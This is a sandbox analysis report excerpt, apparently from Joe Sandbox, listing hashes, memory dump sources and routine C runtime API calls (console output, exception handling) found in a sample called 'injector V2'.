                                                                          • Opcode Fuzzy Hash: 7023ee06924e55dee57c1782168ffbbed45f10e9d65c40dcb7a9dd55fbb28da2
                                                                          • Instruction Fuzzy Hash: 921104B15411197EE72927F15C8ACEF79AFCE943A47141629FA02D2181FF20CE024174
                                                                          APIs
                                                                          • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,0060FF31,00000000,00000001,00000000,?,?,0060E9DA,?,00000000,00000000), ref: 006107D7
                                                                          • GetLastError.KERNEL32(?,0060FF31,00000000,00000001,00000000,?,?,0060E9DA,?,00000000,00000000,?,?,?,0060E320,00000000), ref: 006107E3
                                                                            • Part of subcall function 00610840: CloseHandle.KERNEL32(FFFFFFFE,006107F3,?,0060FF31,00000000,00000001,00000000,?,?,0060E9DA,?,00000000,00000000,?,?), ref: 00610850
                                                                          • ___initconout.LIBCMT ref: 006107F3
                                                                            • Part of subcall function 00610815: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,006107B1,0060FF1E,?,?,0060E9DA,?,00000000,00000000,?), ref: 00610828
                                                                          • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,0060FF31,00000000,00000001,00000000,?,?,0060E9DA,?,00000000,00000000,?), ref: 00610808
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1940053989.00000000005F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                                                                          • Associated: 00000002.00000002.1940023885.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940098407.0000000000613000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940128462.000000000061B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940153408.000000000061F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940177326.0000000000621000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_5f0000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                          • String ID:
                                                                          • API String ID: 2744216297-0
                                                                          • Opcode ID: d7211ebf9c72c28cf54ea0a2a6c7d54fbe707ac9dc50cfad985b0a869f1b6ee2
                                                                          • Instruction ID: b35eae0503a31cd1025018715329e1089a0362180c556f35c69b37157bc1383d
                                                                          • Opcode Fuzzy Hash: d7211ebf9c72c28cf54ea0a2a6c7d54fbe707ac9dc50cfad985b0a869f1b6ee2
                                                                          • Instruction Fuzzy Hash: 27F01C36500118BBCF621F91DC089CA3F6BFF087A1F08D422FA1885121C6B288A1ABE4
                                                                          APIs
                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 00608D75
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1940053989.00000000005F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                                                                          • Associated: 00000002.00000002.1940023885.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940098407.0000000000613000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940128462.000000000061B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940153408.000000000061F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940177326.0000000000621000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_5f0000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: ___except_validate_context_record
                                                                          • String ID: csm$csm
                                                                          • API String ID: 3493665558-3733052814
                                                                          • Opcode ID: a2330c4953a6710867f3c41d4b5234be1d3c65fe3bd1fc86572a63473baf3f7a
                                                                          • Instruction ID: 8b11afee77661924a0d05a3521388727417116ef2c97fae35163a1d6175c0f07
                                                                          • Opcode Fuzzy Hash: a2330c4953a6710867f3c41d4b5234be1d3c65fe3bd1fc86572a63473baf3f7a
                                                                          • Instruction Fuzzy Hash: CF31D276480215EFCF2ADF50C8048EB7B27FF18354B18865AF9844B2A1CB32DDA1DB81
                                                                          APIs
                                                                          • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 006049EA
                                                                          • ___raise_securityfailure.LIBCMT ref: 00604AD2
                                                                            • Part of subcall function 006059FC: RaiseException.KERNEL32(E06D7363,00000001,00000003,006049DE,BB40E64E,?,?,?,006049DE,?,00619B2C), ref: 00605A5C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1940053989.00000000005F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                                                                          • Associated: 00000002.00000002.1940023885.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940098407.0000000000613000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940128462.000000000061B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940153408.000000000061F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940177326.0000000000621000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_5f0000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFeaturePresentProcessorRaise___raise_securityfailure
                                                                          • String ID: %_
                                                                          • API String ID: 3749517692-631382970
                                                                          • Opcode ID: 0e3d6d179a09e30bba519ad8348dfedd156dc01c63e585738d9e71db806265f0
                                                                          • Instruction ID: f85d6b8b1c11415c8c93cfa59a8d61451f7e84eceb7d468a5bf8c7f90720e935
                                                                          • Opcode Fuzzy Hash: 0e3d6d179a09e30bba519ad8348dfedd156dc01c63e585738d9e71db806265f0
                                                                          • Instruction Fuzzy Hash: CF31AEB45842049EC704DF15FC567DE7BABBB08320F18E06BEA05C62E1EB70A594CF44
                                                                          APIs
                                                                          • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 006049EA
                                                                          • ___raise_securityfailure.LIBCMT ref: 00604AD2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1940053989.00000000005F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                                                                          • Associated: 00000002.00000002.1940023885.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940098407.0000000000613000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940128462.000000000061B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940153408.000000000061F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940177326.0000000000621000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_5f0000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                          • String ID: %_
                                                                          • API String ID: 3761405300-631382970
                                                                          • Opcode ID: 8944cf5af3df43d2aa7f003da42e420795e2719aa6954bfa02f38ce225e0c409
                                                                          • Instruction ID: 7ce6d8285f364d8de891ff801a156ceb78237b372abc1788304712c8d347365a
                                                                          • Opcode Fuzzy Hash: 8944cf5af3df43d2aa7f003da42e420795e2719aa6954bfa02f38ce225e0c409
                                                                          • Instruction Fuzzy Hash: 7021E0B55942009ED714CF15E9567997BE7BB48324F18F06BE509CB3B1E3B0A8A08F48
                                                                          APIs
                                                                            • Part of subcall function 00604533: __EH_prolog3_GS.LIBCMT ref: 0060453A
                                                                          • std::domain_error::domain_error.LIBCPMT ref: 006045EC
                                                                            • Part of subcall function 006043A4: std::exception::exception.LIBCONCRT ref: 006043BA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1940053989.00000000005F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                                                                          • Associated: 00000002.00000002.1940023885.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940098407.0000000000613000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940128462.000000000061B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940153408.000000000061F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000002.00000002.1940177326.0000000000621000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_5f0000_injector V2.jbxd
                                                                          Similarity
                                                                          • API ID: H_prolog3_std::domain_error::domain_errorstd::exception::exception
                                                                          • String ID: CD`$CD`
                                                                          • API String ID: 2144476180-1617366341
                                                                          • Opcode ID: 0bb5958aebd25c75ef795059527266947eb5c6619c0b64ad3013c3e3373e8862
                                                                          • Instruction ID: 9fc4a7262d7bf4f98f76d5520bb6271170cf9d2da23b0abeed1232c22c1929e3
                                                                          • Opcode Fuzzy Hash: 0bb5958aebd25c75ef795059527266947eb5c6619c0b64ad3013c3e3373e8862
                                                                          • Instruction Fuzzy Hash: 7C011EB0E00218ABCF18EF69D8458AFBBFAFF88704B50851EE81597341DB74DA15CB94